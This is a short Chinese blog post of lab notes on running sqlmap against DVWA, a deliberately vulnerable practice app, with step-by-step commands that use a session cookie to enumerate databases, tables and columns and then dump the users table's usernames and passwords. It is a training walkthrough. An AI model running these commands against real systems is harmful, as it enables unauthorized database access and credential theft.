画不尽晚风

Sqlmap实验心得

电脑版发表于:2022/11/30 20:59


Sqlmap自动化注入操作步骤

一、POST方法操作步骤

1、打开DVWA,访问sqlinjection,输入1-6任意数据。提交,复制地址。

2获取cookie

3查询数据库

sqlmap -u " 前面复制的地址" 

--cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch

 

4查询dvwa下的表

sqlmap-u ""

--cookie="security=low;PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa --tables

5查询users下的列

sqlmap -u "" 

--cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa -T users --columns

 

 

6获得表的数据

查询用户名、密码

sqlmap -u ""

 --cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa -T users -C user,password,user_id --dump

 

 

 

关于TNBLOG
TNBLOG,技术分享。技术交流:群号677373950
ICP备案 :渝ICP备18016597号-1
App store Android
精彩评论
{{item.replyName}}
{{item.content}}
{{item.time}}
{{subpj.replyName}}
@{{subpj.beReplyName}}{{subpj.content}}
{{subpj.time}}
猜你喜欢